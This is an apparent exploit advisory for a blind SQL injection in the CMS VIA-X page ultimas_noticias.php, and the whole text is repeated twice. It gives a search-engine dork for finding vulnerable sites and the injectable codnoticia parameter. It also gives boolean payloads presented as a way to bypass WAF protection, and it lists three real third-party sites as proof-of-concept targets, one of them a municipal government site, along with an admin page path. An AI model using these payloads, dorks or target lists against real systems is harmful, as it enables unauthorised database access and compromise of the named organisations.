[+] Blind Sql Injection on CMS VIA-X
[+] Date: 23/07/2014
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.viax.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: ultimas_noticias.php
[+} Dork : inurl:ultimas_noticias.php?codnoticia=
[+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]
ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.
[+] PoC: http://www.camaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37
http://www.vandelson.com.br/ultimas_noticias.php?codnoticia=53
http://www.fat.edu.br/ultimas_noticias.php?codnoticia=797
[+] Admin Page: http://host/admin/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
[+] Date: 23/07/2014
[+] CWE Number : CWE-89
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.viax.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: ultimas_noticias.php
[+} Dork : inurl:ultimas_noticias.php?codnoticia=
[+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]
ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.
[+] PoC: http://www.camaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37
http://www.vandelson.com.br/ultimas_noticias.php?codnoticia=53
http://www.fat.edu.br/ultimas_noticias.php?codnoticia=797
[+] Admin Page: http://host/admin/
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information